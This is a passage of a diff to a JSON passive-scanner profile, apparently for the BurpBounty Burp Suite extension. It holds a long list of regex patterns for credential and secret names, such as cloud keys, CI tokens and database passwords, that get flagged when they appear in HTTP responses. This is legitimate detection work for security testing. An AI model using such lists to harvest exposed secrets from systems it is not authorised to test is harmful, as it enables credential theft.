t[_-]sid","true,Or,multi[_-]disconnect[_-]sid","true,Or,multi[_-]workflow[_-]sid","true,Or,multi[_-]workspace[_-]sid","true,Or,my[_-]secret[_-]env","true,Or,mysql[_-]database","true,Or,mysql[_-]hostname","true,Or,mysql[_-]password","true,Or,mysql[_-]root[_-]password","true,Or,mysql[_-]user","true,Or,mysql[_-]username","true,Or,mysqlmasteruser","true,Or,mysqlsecret","true,Or,netlify[_-]api[_-]key","true,Or,new[_-]relic[_-]beta[_-]token","true,Or,nexus[_-]password","true,Or,nexuspassword","true,Or,ngrok[_-]auth[_-]token","true,Or,ngrok[_-]token","true,Or,node[_-]env","true,Or,node[_-]pre[_-]gyp[_-]accesskeyid","true,Or,node[_-]pre[_-]gyp[_-]github[_-]token","true,Or,node[_-]pre[_-]gyp[_-]secretaccesskey","true,Or,non[_-]token","true,Or,now[_-]token","true,Or,npm[_-]api[_-]key","true,Or,npm[_-]api[_-]token","true,Or,npm[_-]auth[_-]token","true,Or,npm[_-]email","true,Or,npm[_-]password","true,Or,npm[_-]secret[_-]key","true,Or,npm[_-]token","true,Or,nuget[_-]api[_-]key","true,Or,nuget[_-]apikey","true,Or,nuget[_-]key","true,Or,numbers[_-]service[_-]pass","true,Or,oauth[_-]token","true,Or,object[_-]storage[_-]password","true,Or,object[_-]storage[_-]region[_-]name","true,Or,object[_-]store[_-]bucket","true,Or,object[_-]store[_-]creds","true,Or,oc[_-]pass","true,Or,octest[_-]app[_-]password","true,Or,octest[_-]app[_-]username","true,Or,octest[_-]password","true,Or,ofta[_-]key","true,Or,ofta[_-]region","true,Or,ofta[_-]secret","true,Or,okta[_-]client[_-]token","true,Or,okta[_-]oauth2[_-]client[_-]secret","true,Or,okta[_-]oauth2[_-]clientsecret","true,Or,omise[_-]key","true,Or,omise[_-]pkey","true,Or,omise[_-]pubkey","true,Or,omise[_-]skey","true,Or,onesignal[_-]api[_-]key","true,Or,onesignal[_-]user[_-]auth[_-]key","true,Or,open[_-]whisk[_-]key","true,Or,openwhisk[_-]key","true,Or,org[_-]gradle[_-]project[_-]sonatype[_-]nexus[_-]password","true,Or,org[_-]project[_-]gradle[_-]sonatype[_-]nexus[_-]password","true,Or,os[_-]auth[_-]url","true,Or,os[_-]password","true,Or,ossrh[_-]jira[_-]password","true,Or,ossrh[_-]pass","true,Or,ossrh[_-]password","true,Or,ossrh[_-]secret","true,Or,ossrh[_-]username","true,Or,packagecloud[_-]token","true,Or,pagerduty[_-]apikey","true,Or,parse[_-]js[_-]key","true,Or,passwordtravis","true,Or,paypal[_-]client[_-]secret","true,Or,percy[_-]project","true,Or,percy[_-]token","true,Or,personal[_-]key","true,Or,personal[_-]secret","true,Or,pg[_-]database","true,Or,pg[_-]host","true,Or,places[_-]api[_-]key","true,Or,places[_-]apikey","true,Or,plotly[_-]apikey","true,Or,plugin[_-]password","true,Or,postgres[_-]env[_-]postgres[_-]db","true,Or,postgres[_-]env[_-]postgres[_-]password","true,Or,postgresql[_-]db","true,Or,postgresql[_-]pass","true,Or,prebuild[_-]auth","true,Or,preferred[_-]username","true,Or,pring[_-]mail[_-]username","true,Or,private[_-]signing[_-]password","true,Or,prod[_-]access[_-]key[_-]id","true,Or,prod[_-]password","true,Or,prod[_-]secret[_-]key","true,Or,project[_-]config","true,Or,publish[_-]access","true,Or,publish[_-]key","true,Or,publish[_-]secret","true,Or,pushover[_-]token","true,Or,pypi[_-]passowrd","true,Or,qiita[_-]token","true,Or,quip[_-]token","true,Or,rabbitmq[_-]password","true,Or,randrmusicapiaccesstoken","true,Or,redis[_-]stunnel[_-]urls","true,Or,rediscloud[_-]url","true,Or,refresh[_-]token","true,Or,registry[_-]pass","true,Or,registry[_-]secure","true,Or,release[_-]gh[_-]token","true,Or,release[_-]token","true,Or,reporting[_-]webdav[_-]pwd","true,Or,reporting[_-]webdav[_-]url","true,Or,repotoken","true,Or,rest[_-]api[_-]key","true,Or,rinkeby[_-]private[_-]key","true,Or,ropsten[_-]private[_-]key","true,Or,route53[_-]access[_-]key[_-]id","true,Or,rtd[_-]key[_-]pass","true,Or,rtd[_-]store[_-]pass","true,Or,rubygems[_-]auth[_-]token","true,Or,s3[_-]access[_-]key","true,Or,s3[_-]access[_-]key[_-]id","true,Or,s3[_-]bucket[_-]name[_-]app[_-]logs","true,Or,s3[_-]bucket[_-]name[_-]assets","true,Or,s3[_-]external[_-]3[_-]amazonaws[_-]com","true,Or,s3[_-]key","true,Or,s3[_-]key[_-]app[_-]logs","true,Or,s3[_-]key[_-]assets","true,Or,s3[_-]secret[_-]app[_-]logs","true,Or,s3[_-]secret[_-]assets","true,Or,s3[_-]secret[_-]key","true,Or,s3[_-]user[_-]secret","true,Or,sacloud[_-]access[_-]token","true,Or,sacloud[_-]access[_-]token[_-]secret","true,Or,sacloud[_-]api","true,Or,salesforce[_-]bulk[_-]test[_-]password","true,Or,salesforce[_-]bulk[_-]test[_-]security[_-]token","true,Or,sandbox[_-]access[_-]token","true,Or,sandbox[_-]aws[_-]access[_-]key[_-]id","true,Or,sandbox[_-]aws[_-]secret[_-]access[_-]key","true,Or,sauce[_-]access[_-]key","true,Or,scrutinizer[_-]token","true,Or,sdr[_-]token","true,Or,secret[_-]0","true,Or,secret[_-]1","true,Or,secret[_-]10","true,Or,secret[_-]11","true,Or,secret[_-]2","true,Or,secret[_-]3","true,Or,secret[_-]4","true,Or,secret[_-]5","true,Or,secret[_-]6","true,Or,secret[_-]7","true,Or,secret[_-]8","true,Or,secret[_-]9","true,Or,secret[_-]key[_-]base","true,Or,segment[_-]api[_-]key","true,Or,selion[_-]log[_-]level[_-]dev","true,Or,selion[_-]selenium[_-]host","true,Or,sendgrid[_-]api[_-]key","true,Or,sendgrid[_-]key","true,Or,sendgrid[_-]password","true,Or,sendgrid[_-]user","true,Or,sendgrid[_-]username","true,Or,sendwithus[_-]key","true,Or,sentry[_-]auth[_-]token","true,Or,sentry[_-]default[_-]org","true,Or,sentry[_-]endpoint","true,Or,sentry[_-]key","true,Or,service[_-]account[_-]secret","true,Or,ses[_-]access[_-]key","true,Or,ses[_-]secret[_-]key","true,Or,signing[_-]key","true,Or,signing[_-]key[_-]password","true,Or,signing[_-]key[_-]secret","true,Or,signing[_-]key[_-]sid","true,Or,slash[_-]developer[_-]space","true,Or,slash[_-]developer[_-]space[_-]key","true,Or,slate[_-]user[_-]email","true,Or,snoowrap[_-]client[_-]secret","true,Or,snoowrap[_-]password","true,Or,snoowrap[_-]refresh[_-]token","true,Or,snyk[_-]api[_-]token","true,Or,snyk[_-]token","true,Or,socrata[_-]app[_-]token","true,Or,socrata[_-]password","true,Or,sonar[_-]organization[_-]key","true,Or,sonar[_-]project[_-]key","true,Or,sonar[_-]token","true,Or,sonatype[_-]gpg[_-]key[_-]name","true,Or,sonatype[_-]gpg[_-]passphrase","true,Or,sonatype[_-]nexus[_-]password","true,Or,sonatype[_-]pass","true,Or,sonatype[_-]password","true,Or,sonatype[_-]token[_-]password","true,Or,sonatype[_-]token[_-]user","true,Or,sonatypepassword","true,Or,soundcloud[_-]client[_-]secret","true,Or,soundcloud[_-]password","true,Or,spaces[_-]access[_-]key[_-]id","true,Or,spaces[_-]secret[_-]access[_-]key","true,Or,spotify[_-]api[_-]access[_-]token","true,Or,spotify[_-]api[_-]client[_-]secret","true,Or,spring[_-]mail[_-]password","true,Or,sqsaccesskey","true,Or,sqssecretkey","true,Or,square[_-]reader[_-]sdk[_-]repository[_-]password","true,Or,srcclr[_-]api[_-]token","true,Or,ssmtp[_-]config","true,Or,staging[_-]base[_-]url[_-]runscope","true,Or,star[_-]test[_-]aws[_-]access[_-]key[_-]id","true,Or,star[_-]test[_-]bucket","true,Or,star[_-]test[_-]location","true,Or,star[_-]test[_-]secret[_-]access[_-]key","true,Or,starship[_-]account[_-]sid","true,Or,starship[_-]auth[_-]token","true,Or,stormpath[_-]api[_-]key[_-]id","true,Or,stormpath[_-]api[_-]key[_-]secret","true,Or,strip[_-]publishable[_-]key","true,Or,strip[_-]secret[_-]key","true,Or,stripe[_-]private","true,Or,stripe[_-]public","true,Or,surge[_-]login","true,Or,surge[_-]token","true,Or,svn[_-]pass","true,Or,tesco[_-]api[_-]key","true,Or,test[_-]github[_-]token","true,Or,test[_-]test","true,Or,tester[_-]keys[_-]password","true,Or,thera[_-]oss[_-]access[_-]key","true,Or,token[_-]core[_-]java","true,Or,travis[_-]access[_-]token","true,Or,travis[_-]api[_-]token","true,Or,travis[_-]branch","true,Or,travis[_-]com[_-]token","true,Or,travis[_-]e2e[_-]token","true,Or,travis[_-]gh[_-]token","true,Or,travis[_-]pull[_-]request","true,Or,travis[_-]secure[_-]env[_-]vars","true,Or,travis[_-]token","true,Or,trex[_-]client[_-]token","true,Or,trex[_-]okta[_-]client[_-]token","true,Or,twilio[_-]api[_-]key","true,Or,twilio[_-]api[_-]secret","true,Or,twilio[_-]chat[_-]account[_-]api[_-]service","true,Or,twilio[_-]configuration[_-]sid","true,Or,twilio[_-]sid","true,Or,twilio[_-]token","true,Or,twine[_-]password","true,Or,twitter[_-]consumer[_-]key","true,Or,twitter[_-]consumer[_-]secret","true,Or,twitteroauthaccesssecret","true,Or,twitteroauthaccesstoken","true,Or,unity[_-]password","true,Or,unity[_-]serial","true,Or,urban[_-]key","true,Or,urban[_-]master[_-]secret","true,Or,urban[_-]secret","true,Or,us[_-]east[_-]1[_-]elb[_-]amazonaws[_-]com","true,Or,use[_-]ssh","true,Or,user[_-]assets[_-]access[_-]key[_-]id","true,Or,user[_-]assets[_-]secret[_-]access[_-]key","true,Or,v[_-]sfdc[_-]client[_-]secret","true,Or,v[_-]sfdc[_-]password","true,Or,vip[_-]github[_-]build[_-]repo[_-]deploy[_-]key","true,Or,vip[_-]github[_-]deploy[_-]key","true,Or,vip[_-]github[_-]deploy[_-]key[_-]pass","true,Or,virustotal[_-]apikey","true,Or,visual[_-]recognition[_-]api[_-]key","true,Or,wakatime[_-]api[_-]key","true,Or,watson[_-]conversation[_-]password","true,Or,watson[_-]device[_-]password","true,Or,watson[_-]password","true,Or,widget[_-]basic[_-]password","true,Or,widget[_-]basic[_-]password[_-]2","true,Or,widget[_-]basic[_-]password[_-]3","true,Or,widget[_-]basic[_-]password[_-]4","true,Or,widget[_-]basic[_-]password[_-]5","true,Or,widget[_-]fb[_-]password","true,Or,widget[_-]fb[_-]password[_-]2","true,Or,widget[_-]fb[_-]password[_-]3","true,Or,widget[_-]test[_-]server","true,Or,wincert[_-]password","true,Or,wordpress[_-]db[_-]password","true,Or,wordpress[_-]db[_-]user","true,Or,wpjm[_-]phpunit[_-]google[_-]geocode[_-]api[_-]key","true,Or,wporg[_-]password","true,Or,wpt[_-]db[_-]password","true,Or,wpt[_-]db[_-]user","true,Or,wpt[_-]prepare[_-]dir","true,Or,wpt[_-]report[_-]api[_-]key","true,Or,wpt[_-]ssh[_-]connect","true,Or,wpt[_-]ssh[_-]private[_-]key[_-]base64","true,Or,www[_-]googleapis[_-]com","true,Or,yangshun[_-]gh[_-]password","true,Or,yangshun[_-]gh[_-]token","true,Or,yt[_-]account[_-]client[_-]secret","true,Or,yt[_-]account[_-]refresh[_-]token","true,Or,yt[_-]api[_-]key","true,Or,yt[_-]client[_-]secret","true,Or,yt[_-]partner[_-]client[_-]secret","true,Or,yt[_-]partner[_-]refresh[_-]token","true,Or,yt[_-]server[_-]api[_-]key","true,Or,zendesk[_-]travis[_-]github","true,Or,zensonatypepassword","true,Or,zhuliang[_-]gh[_-]token","true,Or,zopim[_-]account[_-]key"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Interesting Keywords","IssueSeverity":"Information","IssueConfidence":"Tentative","IssueDetail":"Interesting Keywords detected. Needs manual revision, it could means nothing","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Interesting_Keyworks", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,adzerk[_-]api[_-]key", + "true,Or,algolia[_-]admin[_-]key[_-]1", + "true,Or,algolia[_-]admin[_-]key[_-]2", + "true,Or,algolia[_-]admin[_-]key[_-]mcm", + "true,Or,algolia[_-]api[_-]key", + "true,Or,algolia[_-]api[_-]key[_-]mcm", + "true,Or,algolia[_-]api[_-]key[_-]search", + "true,Or,algolia[_-]search[_-]api[_-]key", + "true,Or,algolia[_-]search[_-]key", + "true,Or,algolia[_-]search[_-]key[_-]1", + "true,Or,alicloud[_-]access[_-]key", + "true,Or,alicloud[_-]secret[_-]key", + "true,Or,amazon[_-]bucket[_-]name", + "true,Or,amazon[_-]secret[_-]access[_-]key", + "true,Or,anaconda[_-]token", + "true,Or,android[_-]docs[_-]deploy[_-]token", + "true,Or,ansible[_-]vault[_-]password", + "true,Or,apiary[_-]api[_-]key", + "true,Or,apigw[_-]access[_-]token", + "true,Or,app[_-]bucket[_-]perm", + "true,Or,app[_-]report[_-]token[_-]key", + "true,Or,apple[_-]id[_-]password", + "true,Or,argos[_-]token", + "true,Or,artifactory[_-]key", + "true,Or,artifacts[_-]aws[_-]access[_-]key[_-]id", + "true,Or,artifacts[_-]aws[_-]secret[_-]access[_-]key", + "true,Or,artifacts[_-]bucket", + "true,Or,artifacts[_-]key", + "true,Or,artifacts[_-]secret", + "true,Or,assistant[_-]iam[_-]apikey", + "true,Or,auth0[_-]api[_-]clientsecret", + "true,Or,auth0[_-]client[_-]secret", + "true,Or,author[_-]email[_-]addr", + "true,Or,author[_-]npm[_-]api[_-]key", + "true,Or,aws[_-]access[_-]key", + "true,Or,aws[_-]access[_-]key[_-]id", + "true,Or,aws[_-]config[_-]accesskeyid", + "true,Or,aws[_-]config[_-]secretaccesskey", + "true,Or,aws[_-]secret[_-]access[_-]key", + "true,Or,aws[_-]secret[_-]key", + "true,Or,aws[_-]ses[_-]access[_-]key[_-]id", + "true,Or,aws[_-]ses[_-]secret[_-]access[_-]key", + "true,Or,awscn[_-]access[_-]key[_-]id", + "true,Or,awscn[_-]secret[_-]access[_-]key", + "true,Or,b2[_-]app[_-]key", + "true,Or,b2[_-]bucket", + "true,Or,bintray[_-]api[_-]key", + "true,Or,bintray[_-]apikey", + "true,Or,bintray[_-]gpg[_-]password", + "true,Or,bintray[_-]key", + "true,Or,bintray[_-]token", + "true,Or,bluemix[_-]api[_-]key", + "true,Or,bluemix[_-]auth", + "true,Or,bluemix[_-]pass", + "true,Or,bluemix[_-]pass[_-]prod", + "true,Or,bluemix[_-]password", + "true,Or,bluemix[_-]pwd", + "true,Or,bluemix[_-]username", + "true,Or,brackets[_-]repo[_-]oauth[_-]token", + "true,Or,browser[_-]stack[_-]access[_-]key", + "true,Or,browserstack[_-]access[_-]key", + "true,Or,bucketeer[_-]aws[_-]access[_-]key[_-]id", + "true,Or,bucketeer[_-]aws[_-]secret[_-]access[_-]key", + "true,Or,built[_-]branch[_-]deploy[_-]key", + "true,Or,bundlesize[_-]github[_-]token", + "true,Or,bx[_-]password", + "true,Or,bx[_-]username", + "true,Or,cache[_-]s3[_-]secret[_-]key", + "true,Or,cargo[_-]token", + "true,Or,cattle[_-]access[_-]key", + "true,Or,cattle[_-]agent[_-]instance[_-]auth", + "true,Or,cattle[_-]secret[_-]key", + "true,Or,censys[_-]secret", + "true,Or,certificate[_-]password", + "true,Or,cf[_-]password", + "true,Or,cheverny[_-]token", + "true,Or,chrome[_-]client[_-]secret", + "true,Or,chrome[_-]refresh[_-]token", + "true,Or,ci[_-]deploy[_-]password", + "true,Or,ci[_-]project[_-]url", + "true,Or,ci[_-]registry[_-]user", + "true,Or,ci[_-]server[_-]name", + "true,Or,ci[_-]user[_-]token", + "true,Or,claimr[_-]database", + "true,Or,claimr[_-]db", + "true,Or,claimr[_-]superuser", + "true,Or,claimr[_-]token", + "true,Or,cli[_-]e2e[_-]cma[_-]token", + "true,Or,client[_-]secret", + "true,Or,clojars[_-]password", + "true,Or,cloud[_-]api[_-]key", + "true,Or,cloudant[_-]archived[_-]database", + "true,Or,cloudant[_-]audited[_-]database", + "true,Or,cloudant[_-]database", + "true,Or,cloudant[_-]instance", + "true,Or,cloudant[_-]order[_-]database", + "true,Or,cloudant[_-]parsed[_-]database", + "true,Or,cloudant[_-]password", + "true,Or,cloudant[_-]processed[_-]database", + "true,Or,cloudant[_-]service[_-]database", + "true,Or,cloudflare[_-]api[_-]key", + "true,Or,cloudflare[_-]auth[_-]email", + "true,Or,cloudflare[_-]auth[_-]key", + "true,Or,cloudflare[_-]email", + "true,Or,cloudinary[_-]url", + "true,Or,cloudinary[_-]url[_-]staging", + "true,Or,clu[_-]repo[_-]url", + "true,Or,clu[_-]ssh[_-]private[_-]key[_-]base64", + "true,Or,cn[_-]access[_-]key[_-]id", + "true,Or,cn[_-]secret[_-]access[_-]key", + "true,Or,cocoapods[_-]trunk[_-]email", + "true,Or,cocoapods[_-]trunk[_-]token", + "true,Or,codacy[_-]project[_-]token", + "true,Or,codeclimate[_-]repo[_-]token", + "true,Or,codecov[_-]token", + "true,Or,coding[_-]token", + "true,Or,conekta[_-]apikey", + "true,Or,contentful[_-]access[_-]token", + "true,Or,contentful[_-]cma[_-]test[_-]token", + "true,Or,contentful[_-]integration[_-]management[_-]token", + "true,Or,contentful[_-]management[_-]api[_-]access[_-]token", + "true,Or,contentful[_-]management[_-]api[_-]access[_-]token[_-]new", + "true,Or,contentful[_-]php[_-]management[_-]test[_-]token", + "true,Or,contentful[_-]test[_-]org[_-]cma[_-]token", + "true,Or,contentful[_-]v2[_-]access[_-]token", + "true,Or,conversation[_-]password", + "true,Or,conversation[_-]username", + "true,Or,cos[_-]secrets", + "true,Or,coveralls[_-]api[_-]token", + "true,Or,coveralls[_-]repo[_-]token", + "true,Or,coveralls[_-]token", + "true,Or,coverity[_-]scan[_-]token", + "true,Or,cypress[_-]record[_-]key", + "true,Or,danger[_-]github[_-]api[_-]token", + "true,Or,database[_-]host", + "true,Or,database[_-]name", + "true,Or,database[_-]password", + "true,Or,database[_-]port", + "true,Or,database[_-]user", + "true,Or,database[_-]username", + "true,Or,datadog[_-]api[_-]key", + "true,Or,datadog[_-]app[_-]key", + "true,Or,db[_-]connection", + "true,Or,db[_-]database", + "true,Or,db[_-]host", + "true,Or,db[_-]password", + "true,Or,db[_-]pw", + "true,Or,db[_-]user", + "true,Or,db[_-]username", + "true,Or,ddg[_-]test[_-]email", + "true,Or,ddg[_-]test[_-]email[_-]pw", + "true,Or,ddgc[_-]github[_-]token", + "true,Or,deploy[_-]password", + "true,Or,deploy[_-]secure", + "true,Or,deploy[_-]token", + "true,Or,deploy[_-]user", + "true,Or,dgpg[_-]passphrase", + "true,Or,digitalocean[_-]access[_-]token", + "true,Or,digitalocean[_-]ssh[_-]key[_-]body", + "true,Or,digitalocean[_-]ssh[_-]key[_-]ids", + "true,Or,docker[_-]hub[_-]password", + "true,Or,docker[_-]key", + "true,Or,docker[_-]pass", + "true,Or,docker[_-]passwd", + "true,Or,docker[_-]password", + "true,Or,docker[_-]postgres[_-]url", + "true,Or,docker[_-]token", + "true,Or,dockerhub[_-]password", + "true,Or,dockerhubpassword", + "true,Or,doordash[_-]auth[_-]token", + "true,Or,dropbox[_-]oauth[_-]bearer", + "true,Or,droplet[_-]travis[_-]password", + "true,Or,dsonar[_-]login", + "true,Or,dsonar[_-]projectkey", + "true,Or,elastic[_-]cloud[_-]auth", + "true,Or,elasticsearch[_-]password", + "true,Or,encryption[_-]password", + "true,Or,end[_-]user[_-]password", + "true,Or,env[_-]github[_-]oauth[_-]token", + "true,Or,env[_-]heroku[_-]api[_-]key", + "true,Or,env[_-]key", + "true,Or,env[_-]secret", + "true,Or,env[_-]secret[_-]access[_-]key", + "true,Or,env[_-]sonatype[_-]password", + "true,Or,eureka[_-]awssecretkey", + "true,Or,exp[_-]password", + "true,Or,file[_-]password", + "true,Or,firebase[_-]api[_-]json", + "true,Or,firebase[_-]api[_-]token", + "true,Or,firebase[_-]key", + "true,Or,firebase[_-]project[_-]develop", + "true,Or,firebase[_-]token", + "true,Or,firefox[_-]secret", + "true,Or,flask[_-]secret[_-]key", + "true,Or,flickr[_-]api[_-]key", + "true,Or,flickr[_-]api[_-]secret", + "true,Or,fossa[_-]api[_-]key", + "true,Or,ftp[_-]host", + "true,Or,ftp[_-]login", + "true,Or,ftp[_-]password", + "true,Or,ftp[_-]pw", + "true,Or,ftp[_-]user", + "true,Or,ftp[_-]username", + "true,Or,gcloud[_-]bucket", + "true,Or,gcloud[_-]project", + "true,Or,gcloud[_-]service[_-]key", + "true,Or,gcr[_-]password", + "true,Or,gcs[_-]bucket", + "true,Or,gh[_-]api[_-]key", + "true,Or,gh[_-]email", + "true,Or,gh[_-]next[_-]oauth[_-]client[_-]secret", + "true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]id", + "true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]secret", + "true,Or,gh[_-]oauth[_-]client[_-]secret", + "true,Or,gh[_-]oauth[_-]token", + "true,Or,gh[_-]repo[_-]token", + "true,Or,gh[_-]token", + "true,Or,gh[_-]unstable[_-]oauth[_-]client[_-]secret", + "true,Or,ghb[_-]token", + "true,Or,ghost[_-]api[_-]key", + "true,Or,git[_-]author[_-]email", + "true,Or,git[_-]author[_-]name", + "true,Or,git[_-]committer[_-]email", + "true,Or,git[_-]committer[_-]name", + "true,Or,git[_-]email", + "true,Or,git[_-]name", + "true,Or,git[_-]token", + "true,Or,github[_-]access[_-]token", + "true,Or,github[_-]api[_-]key", + "true,Or,github[_-]api[_-]token", + "true,Or,github[_-]auth", + "true,Or,github[_-]auth[_-]token", + "true,Or,github[_-]client[_-]secret", + "true,Or,github[_-]deploy[_-]hb[_-]doc[_-]pass", + "true,Or,github[_-]deployment[_-]token", + "true,Or,github[_-]hunter[_-]token", + "true,Or,github[_-]hunter[_-]username", + "true,Or,github[_-]oauth", + "true,Or,github[_-]oauth[_-]token", + "true,Or,github[_-]password", + "true,Or,github[_-]pwd", + "true,Or,github[_-]release[_-]token", + "true,Or,github[_-]repo", + "true,Or,github[_-]token", + "true,Or,github[_-]tokens", + "true,Or,gitlab[_-]user[_-]email", + "true,Or,gogs[_-]password", + "true,Or,google[_-]account[_-]type", + "true,Or,google[_-]client[_-]email", + "true,Or,google[_-]client[_-]id", + "true,Or,google[_-]client[_-]secret", + "true,Or,google[_-]maps[_-]api[_-]key", + "true,Or,google[_-]private[_-]key", + "true,Or,gpg[_-]key[_-]name", + "true,Or,gpg[_-]keyname", + "true,Or,gpg[_-]ownertrust", + "true,Or,gpg[_-]passphrase", + "true,Or,gpg[_-]private[_-]key", + "true,Or,gpg[_-]secret[_-]keys", + "true,Or,gradle[_-]publish[_-]key", + "true,Or,gradle[_-]publish[_-]secret", + "true,Or,gradle[_-]signing[_-]key[_-]id", + "true,Or,gradle[_-]signing[_-]password", + "true,Or,gren[_-]github[_-]token", + "true,Or,grgit[_-]user", + "true,Or,hab[_-]auth[_-]token", + "true,Or,hab[_-]key", + "true,Or,hb[_-]codesign[_-]gpg[_-]pass", + "true,Or,hb[_-]codesign[_-]key[_-]pass", + "true,Or,heroku[_-]api[_-]key", + "true,Or,heroku[_-]email", + "true,Or,heroku[_-]token", + "true,Or,hockeyapp[_-]token", + "true,Or,homebrew[_-]github[_-]api[_-]token", + "true,Or,hub[_-]dxia2[_-]password", + "true,Or,ij[_-]repo[_-]password", + "true,Or,ij[_-]repo[_-]username", + "true,Or,index[_-]name", + "true,Or,integration[_-]test[_-]api[_-]key", + "true,Or,integration[_-]test[_-]appid", + "true,Or,internal[_-]secrets", + "true,Or,ios[_-]docs[_-]deploy[_-]token", + "true,Or,itest[_-]gh[_-]token", + "true,Or,jdbc[_-]databaseurl", + "true,Or,jdbc[_-]host", + "true,Or,jwt[_-]secret", + "true,Or,kafka[_-]admin[_-]url", + "true,Or,kafka[_-]instance[_-]name", + "true,Or,kafka[_-]rest[_-]url", + "true,Or,keystore[_-]pass", + "true,Or,kovan[_-]private[_-]key", + "true,Or,kubecfg[_-]s3[_-]path", + "true,Or,kxoltsn3vogdop92m", + "true,Or,leanplum[_-]key", + "true,Or,lektor[_-]deploy[_-]password", + "true,Or,lektor[_-]deploy[_-]username", + "true,Or,lighthouse[_-]api[_-]key", + "true,Or,linkedin[_-]client[_-]secretor lottie[_-]s3[_-]api[_-]key", + "true,Or,linux[_-]signing[_-]key", + "true,Or,ll[_-]publish[_-]url", + "true,Or,ll[_-]shared[_-]key", + "true,Or,looker[_-]test[_-]runner[_-]client[_-]secret", + "true,Or,lottie[_-]happo[_-]api[_-]key", + "true,Or,lottie[_-]happo[_-]secret[_-]key", + "true,Or,lottie[_-]s3[_-]secret[_-]key", + "true,Or,lottie[_-]upload[_-]cert[_-]key[_-]password", + "true,Or,lottie[_-]upload[_-]cert[_-]key[_-]store[_-]password", + "true,Or,magento[_-]auth[_-]password", + "true,Or,magento[_-]auth[_-]username ", + "true,Or,magento[_-]password", + "true,Or,mail[_-]password", + "true,Or,mailchimp[_-]api[_-]key", + "true,Or,mailchimp[_-]key", + "true,Or,mailer[_-]password", + "true,Or,mailgun[_-]api[_-]key", + "true,Or,mailgun[_-]apikey", + "true,Or,mailgun[_-]password", + "true,Or,mailgun[_-]priv[_-]key", + "true,Or,mailgun[_-]pub[_-]apikey", + "true,Or,mailgun[_-]pub[_-]key", + "true,Or,mailgun[_-]secret[_-]api[_-]key", + "true,Or,manage[_-]key", + "true,Or,manage[_-]secret", + "true,Or,management[_-]token", + "true,Or,managementapiaccesstoken", + "true,Or,mandrill[_-]api[_-]key", + "true,Or,manifest[_-]app[_-]token", + "true,Or,manifest[_-]app[_-]url", + "true,Or,mapbox[_-]access[_-]token", + "true,Or,mapbox[_-]api[_-]token", + "true,Or,mapbox[_-]aws[_-]access[_-]key[_-]id", + "true,Or,mapbox[_-]aws[_-]secret[_-]access[_-]key", + "true,Or,mapboxaccesstoken", + "true,Or,mg[_-]api[_-]key", + "true,Or,mg[_-]public[_-]api[_-]key", + "true,Or,mh[_-]apikey", + "true,Or,mh[_-]password", + "true,Or,mile[_-]zero[_-]key", + "true,Or,minio[_-]access[_-]key", + "true,Or,minio[_-]secret[_-]key", + "true,Or,multi[_-]bob[_-]sid", + "true,Or,multi[_-]connect[_-]sid", + "true,Or,multi[_-]disconnect[_-]sid", + "true,Or,multi[_-]workflow[_-]sid", + "true,Or,multi[_-]workspace[_-]sid", + "true,Or,my[_-]secret[_-]env", + "true,Or,mysql[_-]database", + "true,Or,mysql[_-]hostname", + "true,Or,mysql[_-]password", + "true,Or,mysql[_-]root[_-]password", + "true,Or,mysql[_-]user", + "true,Or,mysql[_-]username", + "true,Or,mysqlmasteruser", + "true,Or,mysqlsecret", + "true,Or,netlify[_-]api[_-]key", + "true,Or,new[_-]relic[_-]beta[_-]token", + "true,Or,nexus[_-]password", + "true,Or,nexuspassword", + "true,Or,ngrok[_-]auth[_-]token", + "true,Or,ngrok[_-]token", + "true,Or,node[_-]env", + "true,Or,node[_-]pre[_-]gyp[_-]accesskeyid", + "true,Or,node[_-]pre[_-]gyp[_-]github[_-]token", + "true,Or,node[_-]pre[_-]gyp[_-]secretaccesskey", + "true,Or,non[_-]token", + "true,Or,now[_-]token", + "true,Or,npm[_-]api[_-]key", + "true,Or,npm[_-]api[_-]token", + "true,Or,npm[_-]auth[_-]token", + "true,Or,npm[_-]email", + "true,Or,npm[_-]password", + "true,Or,npm[_-]secret[_-]key", + "true,Or,npm[_-]token", + "true,Or,nuget[_-]api[_-]key", + "true,Or,nuget[_-]apikey", + "true,Or,nuget[_-]key", + "true,Or,numbers[_-]service[_-]pass", + "true,Or,oauth[_-]token", + "true,Or,object[_-]storage[_-]password", + "true,Or,object[_-]storage[_-]region[_-]name", + "true,Or,object[_-]store[_-]bucket", + "true,Or,object[_-]store[_-]creds", + "true,Or,oc[_-]pass", + "true,Or,octest[_-]app[_-]password", + "true,Or,octest[_-]app[_-]username", + "true,Or,octest[_-]password", + "true,Or,ofta[_-]key", + "true,Or,ofta[_-]region", + "true,Or,ofta[_-]secret", + "true,Or,okta[_-]client[_-]token", + "true,Or,okta[_-]oauth2[_-]client[_-]secret", + "true,Or,okta[_-]oauth2[_-]clientsecret", + "true,Or,omise[_-]key", + "true,Or,omise[_-]pkey", + "true,Or,omise[_-]pubkey", + "true,Or,omise[_-]skey", + "true,Or,onesignal[_-]api[_-]key", + "true,Or,onesignal[_-]user[_-]auth[_-]key", + "true,Or,open[_-]whisk[_-]key", + "true,Or,openwhisk[_-]key", + "true,Or,org[_-]gradle[_-]project[_-]sonatype[_-]nexus[_-]password", + "true,Or,org[_-]project[_-]gradle[_-]sonatype[_-]nexus[_-]password", + "true,Or,os[_-]auth[_-]url", + "true,Or,os[_-]password", + "true,Or,ossrh[_-]jira[_-]password", + "true,Or,ossrh[_-]pass", + "true,Or,ossrh[_-]password", + "true,Or,ossrh[_-]secret", + "true,Or,ossrh[_-]username", + "true,Or,packagecloud[_-]token", + "true,Or,pagerduty[_-]apikey", + 